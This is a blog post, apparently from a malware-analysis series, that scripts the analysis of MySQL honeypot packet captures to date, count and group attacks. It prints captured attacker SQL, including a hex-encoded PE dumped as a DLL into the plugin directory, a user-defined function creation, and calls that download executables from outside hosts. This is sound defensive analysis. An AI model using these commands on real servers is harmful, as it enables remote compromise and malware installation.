Increase in MySQL Attacks: Examining the History

Seeing an increase in MySQL attacks hitting your network and interested in knowing more about them? If so, then these posts are for you. They have all the fun involved from noticing an increase in traffic to extracting malware from a packet capture and analysing it. If you like the thrills and spills of scripting information processing tasks, then read on as this post will show you how to script the gathering of information from packet captures.

In the previous post in this series, we set a trap to capture the next MySQL attack that comes along. I wanted to get the MySQL honeypot up and running because I didn’t know how long these attacks were going to go on for, and wanted to make sure that I caught one before they stopped. This blog post is based on a true story, however one fictitious element has been added for dramatic effect — see if you can spot it.

Now that the honeypot is running, can we find some background information about the attacks such as when the attacks started, how many there were, which hosts were carrying out the attacks, and how many variants (if any) there were?

Luckily for us, the Honeynet Project‘s Honeywall installation is automatically set up to log all packets to pcap files — we just have to find the information that we want and extract it. Unluckily, my honeynet has been running for almost a year now and has about 1.5 GB of pcap files. Despite that, let’s make ourselves a cuppa and get started.

Combining pcap files

First things first, let’s get the pcap data in to something more usable and manageable. At the moment, it is spread over 6470 pcap files with one hour’s worth of data in each one. This makes sure that the pcap files don’t get too large, but it also makes it harder to do any analysis across them. What we’ll do is use mergecap to combine multiple pcap files in to one.

If we attempt to do this with one command, however, we’ll run in to a problem:

$ mergecap -w bigfile.pcap 13*/log
mergecap: Can’t open 1332363661/log: Too many open files

I thought we’d run in to the other problem where the UNIX command line ends up being too long. Instead the length of the command line seems ok, but it would seem that mergecap attempted to open all the input files at once and has exceeded the operating system’s limit on the number of open files per process.

We’re going to have to weave some magic or, and possibly the safer option given how well my magic trick of sawing the cat in half turned out, do some shell scripting.

$ ls -1 13*/log | awk -f mergecaps.awk -v prefix=week

This bit of script isn’t going to saw any cats in half, but it will output a series of mergecap commands which, when executed, will combine 168 hourly pcap files in to one weekly pcap file. Basically we’re scripting the creation of a script.

The 13*/log is a file matching pattern that will match the file log in all directories starting with 13. The -1 (that is the digit one) tells the ls command to output one name per line. I simply tared the contents of the /var/log/pcap/ directory on the honeywall box, and extracted it on to a host that was easier to work on.

If you are feeling game, you can put back-quote characters (` … `) around that shell command line and have the shell run the output from it directly.

Alternatively, if you’ve grown more cautious as the result of running an rm -rf command in the wrong directory, say, and now prefer to check commands before running them, then redirect that output to a file (> domerge.sh) where you can check it before running it.

Let’s run that script (you’ll more than likely either need to source it, or give yourself execute permissions on it first):

$ chmod u+x domerge.sh
$ ./domerge.sh

Now that we have fixed up the corrupt pcap file, that script has produced 39 pcap files named week0000.pcap through week0038.pcap. Let’s get some funky stuff happening with tshark.

Using tshark to extract data

I figured that the different attacks could be characterised by the MySQL commands that they issued. I created two scripts to help with this part of the exercise. The first script, getfieldtimes.sh extracts given packet fields along with the capture time of the packet. The second script, createtimeline.sh combines those timestamped packet fields in to a timeline.

tshark and hence getfieldtimes.sh will only take one pcap file at a time, so we’ll need to run it in a for loop.

$ for file in week*.pcap; do
      ./getfieldtimes.sh -f mysql.query "$file" mysql.query ip.src tcp.srcport ip.dst > "$file".txt
  done

Having a look at the first file, week0000.pcap.txt we see the following (I’ve left out the time_epoch column, as that is really only there to help us sort the data later):

Feb  5, 2012 11:20:35.759898000 drop function cmdshell  _._._.146 2514    555.13.7.3
Feb  5, 2012 11:20:41.770889000 drop function cmdshell  _._._.146 4560    555.13.7.3
Feb  5, 2012 11:20:42.637115000 drop function my_udfdoor        _._._.146 4560    555.13.7.3
Feb  5, 2012 11:20:42.726765000 drop function my_udfdoor        _._._.146 2514    555.13.7.3
Feb  5, 2012 11:20:43.217325000 drop function do_system _._._.146 4560    555.13.7.3
Feb  5, 2012 11:20:44.132353000 use mysql;      _._._.146 4560    555.13.7.3
Feb  5, 2012 11:20:44.866309000 drop table if exists tempMix4;  _._._.146 4560    555.13.7.3
Feb  5, 2012 11:20:47.318702000 create table if not exists tempMix4(data LONGBLOB);     _._._.146 4560    555.13.7.3
Feb  5, 2012 11:21:08.858470000 drop function do_system _._._.146 2514    555.13.7.3
Feb  5, 2012 11:21:09.530746000 use mysql;      _._._.146 2514    555.13.7.3
Feb  5, 2012 11:21:10.217643000 drop table if exists tempMix4;  _._._.146 2514    555.13.7.3
Feb  5, 2012 11:21:15.528832000 create table if not exists tempMix4(data LONGBLOB);     _._._.146 2514    555.13.7.3
Feb  5, 2012 11:21:58.377290000 set @a = concat('',0x4D5A9000    _._._.146 4560    555.13.7.3

All that (and more) came from the same source address, but as you can see from the TCP source port, the host opened two TCP connections to the honeypot host, and sent the same commands over both.

Note that the last command looks like it is using hex notation to load binary data into something called @a. Notice anything special about those first two bytes (first four hex digits)? They look like they could be printable ASCII characters. If we remember that ‘A’, being the first letter of the alphabet, is 0x41 (0x40 + 0x01), then 0x4D will be the thirteenth letter of the alphabet (0x40 + 0x0D), which is ‘M’, and 0x5A is 0x40 + 0x1A so it will be the twenty-sixth (0x1A == (1 * 16) + 10) letter of the alphabet, which is ‘Z’.

Recognise ‘MZ’? It is the start of a Windows PE (Portable Executable) file. The plot thickens…

I know that the MySQL commands issued by attackers have changed over time because the later ones were issuing ‘set autocommit=0’ and Dionaea was failing to handle them. This suggests that we could have a few different attacks coming in, or modified versions of the same attack.

Let’s go through those .txt files of MySQL commands, find all the different commands and see if we can get the time period during which they were issued. The human readable date/time format that tshark spat out is annoying to use as a sort key, which is why I asked tshark to include the frame.time_epoch (seconds since epoch) field in its output.

Next, we can list each command along with the time that it was first seen, the time that it was last seen, and how many times we saw it. This can then be sorted to give us a timeline of when each MySQL query was first seen. This is where my createtimeline.sh script comes in:

$ cat week*.pcap.txt | ./createtimeline.sh > timeline
[...]
Mar 10, 2012 19:18:56.203466000 Mar 10, 2012 19:20:06.091484000 2       set @a = concat('',0x4D5A9000...
Mar 11, 2012 15:26:02.279290000 Mar 11, 2012 15:28:25.286394000 5       set @a = concat('',0x4D5A9000...
Mar 16, 2012 09:06:08.391164000 Nov  4, 2012 14:05:34.194259000 33799   set autocommit=0
Mar 17, 2012 03:01:18.623449000 Jul 17, 2012 01:21:27.473635000 15      set @a = concat('',0x4D5A9000...
Mar 18, 2012 19:48:24.598388000 Mar 18, 2012 19:48:24.598388000 1       set @a = concat('',0x4D5A3831...
[...]

What I got out of that was a timeline that was showing that the ‘set autocommit=0’ queries started on March 16th, and that there have been 33,799 of them, which is by far the most occurring query. However, this could be caused by Dionaea returning an unexpected reply in response to them, and as a result the attacking host has sent the query a few more times hoping that it would work.

Let’s break the list of MySQL queries out in to separate attacks, based on source IP address and source port.

$ cat week*.pcap.txt |./getattacks.sh 3 4 5

Smashing. That script will process each of the lists of MySQL queries and write all the commands from packets with the same source IP address and source port within one hour (3600 seconds) of each other, to the same file. That is, it will group the MySQL commands by connection assuming that there wasn’t a gap of more than one hour between commands in any one connection, nor that there were two connections with the same source address and port within one hour of each other.

The 3, 4, and 5 are the field (column) numbers of the MySQL command, source IP address, and source port, respectively.

Since the packets in the pcap files are in chronological order, the pcap files were processed in chronological order (as they were stored in subdirectories named based on their creation time), and the week*.pcap.txt files are sequentially numbered as the pcap files were processed, the commands in the week*.pcap.txt files will be in chronological order.

Let’s separate the attacks containing the set autocommit=0 command, do a sanity check, and then generate MD5 hashes of each attack:

# move the attacks containing set autocommit=0 to a subdirectory
$ mkdir autocommit
$ mv `grep "autocommit" attack_* | cut -d: -f1-2 | sort | uniq` autocommit/
$ cd autocommit

# sanity check: check that we still have 33,799 autocommit commands
$ grep "autocommit" attack* | wc -l
33799

# how many attacks
$ ls -1 attack* | wc -l
33547

# generate MD5 hashes
$ md5sum -b attack* > md5sums

# how many unique 'autocommit' attacks do we have?
# tab character after -d\ followed by a space
$ cut -d\  -f1 md5sums | sort | uniq | wc -l
14

# create a hard link to the unique attacks, in a subdirectory
# space character after -d\ followed by a second space
$ mkdir unique
$ cut -d\  -f1 md5sums | sort | uniq | while read md5; do
      ln `grep "$md5" md5sums | head -1 | cut -d\  -f2 | tr -d "*"` unique/
  done

# for each of the unique attacks, get the time of first occurrence
$ cd unique
$ for filename in attack*; do
      ts="`echo $filename | cut -d_ -f2 | cut -d. -f1`"
      echo "`date +\"%Y-%m-%dT%H:%M:%S\" -d \"@$ts\"` $filename"
  done
2012-11-03T00:03:06 attack_1351861386.708078000_a.b.c.193:2010
2012-11-03T03:14:37 attack_1351872877.550115000_a.b.c.85:4091
2012-11-03T08:22:21 attack_1351891341.847195000_a.b.c.239:1707-
2012-11-03T09:51:58 attack_1351896718.580428000_a.b.c.21:4385
2012-11-03T18:29:39 attack_1351927779.842094000_a.b.c.50:4757
2012-11-03T23:26:00 attack_1351945560.382071000_a.b.c.37:1743
2012-11-04T02:35:11 attack_1351956911.184890000_a.b.c.41:4120
2012-11-04T11:02:30 attack_1351987350.867306000_a.b.c.41:2621
2012-11-04T14:05:34 attack_1351998334.194259000_a.b.c.240:3382

Discounting the attacks that didn’t occur in November, as they would have hit the Dionaea server and not the MySQL server, that leaves nine unique attacks. The November attacks were all 7,xxx bytes in size with the exception of one which was only 34 bytes. The 34 byte one was just doing:

set autocommit=0
SELECT VERSION()

That leaves eight real attacks. Let’s have a look at the remaining eight to see how they differ. I spent some time trying to come up with a good way of doing this, that would also scale to analysing considerably more attacks, but couldn’t. In the end I went with this approach which displays a list of all the unique commands used in the attacks, along with a count of how often each one occurred. The attack_* pattern needs to match the eight remaining attack_* files, so rm the non-November and short ones (they are hard links, so the files will still exist in the parent directory):

$ cat attack_* | sort | uniq -c
      8 commit
      8 CREATE FUNCTION xpdl3 RETURNS STRING SONAME 'cna12.dll'
      8 create table yongger2(data LONGBLOB)
      8 drop FUNCTION IF EXISTS xpdl3
     16 drop FUNCTION xpdl3
     17 drop table IF EXISTS yongger2
      8 execute sql3
      8 insert into yongger2 values(\"\")
      8 prepare sql3 from @dir2
      8 select data from yongger2 into DUMPFILE '..\\\\bin\\\\cna12.dll'
      8 SELECT VERSION()
      1 select xpdl3('http://x.y.z.5:85/3306.exe','c:\\\\isetup.exe')
      1 select xpdl3('http://x.y.z.182:911/2.exe','c:\\\\isetup.exe')
      2 select xpdl3('http://x.y.z.41:3382/svchost.exe','c:\\\\isetup.exe')
      1 select xpdl3('http://x.y.z.85:5678/server.exe','c:\\\\isetup.exe')
      1 select xpdl3('http://....org:8081/3306.exe','c:\\\\isetup.exe')
      1 select xpdl3('http://x.y.z.150:687/cn.exe','c:\\\\isetup.exe')
      1 select xpdl3('http://x.y.z.50:99/Zip.exe','c:\\\\isetup.exe')
      8 set @a = concat('',0x4D5A9000...
      8 set autocommit=0
      8 set @dir2 = concat('select data from yongger2 into DUMPFILE \"',@@plugin_dir,'\\\\cna12.dll\"')
      8 set @dir2 = replace(@dir2,'\\\\','\\\\\\\\')
      8 set @dir2 = replace(@dir2,\"/\",\"\\\\\\\\\")
     17 SHOW WARNINGS
      8 update yongger2 set data = @a
      8 use mysql

While we can’t be certain, let’s assume that each line that occurred eight times, occurred once in each file (attack). Lines that occurred more than eight times obviously occurred more than once / attack.

The main thing that we notice from this output is that the attacks only really differ (lines occurring less than eight times) in the URL appearing in the select xpdl3() commands. I don’t know about you, but from looking at those commands, I would hazard a guess that they were going to download the given URL to the given filename.

As for which hosts are carrying out these attacks:

$ ls -1 attack_* | cut -d_ -f3 | cut -d: -f1 | sort | uniq

That command just pulls the IP address out of the attack file filenames. Add a ‘| wc -l’ on the end if you want to know how many unique hosts that is. I got 322 hosts from my data covering all of the ‘autocommit’ MySQL attacks.

Answers

Now we can answer the initial questions:

When did the ‘autocommit’ attacks start?
Mar 16th 2012
How many were there?
33,547
Which hosts were carrying out the attacks? This command will list them. I won’t include them as there were a lot and I’d only obfuscate them anyway.
```
$ ls -1 attack_* | cut -d_ -f3 | cut -d: -f1 | sort | uniq
```
How many unique variants were there?
There were nine unique variants that hit the MySQL server. They mainly differed in the URL that they were downloading. One of the variants didn’t really have any payload. This may have been an aborted connection, or due to tcpdump on the honeywall host missing packets.

I’ll just quickly check the November attack that appears to be missing a payload. I’ll find the connection in the original pcap file and have a look at it in wireshark.

# find which pcap file it is in. Note that that is a tab character in between the IP address and source port
$ grep "a\.b\.c\.21 4385" week*.pcap.txt | cut -d: -f1 | uniq
week0038.pcap.txt

# open the corresponding pcap file with wireshark
$ wireshark week0038.pcap

Note that the ‘\’ characters are necessary in the regular expression given to the grep command, as a ‘.’ character in a regular expression will match any character. The ‘\’ character before it escapes it and says that we want to match a literal ‘.’ character instead.

Filtering on IP address and TCP port I can see that there was more to that connection than what we have in the text files, however wireshark is reporting some issues with that particular connection, namely dropped packets and retransmissions. Those two commands were from the only packets that wireshark was able to identify as MySQL query packets.

I used wireshark‘s Follow TCP Stream function and then selected inbound packets instead of the entire conversation. I then saved that as a corrected attack_ file. It is another variant that differs by the URL that it downloads. That exercise taught me that tshark was escaping certain characters like ‘\’, so those .txt files are actually showing twice as many ‘\’ characters as what was actually in the TCP connection.

The next part in the series will describe how we can extract the Windows PE executables from the string of hex characters in the MySQL commands, and then analyse them.

Malware Musings

Thoughts on malware and malware analysis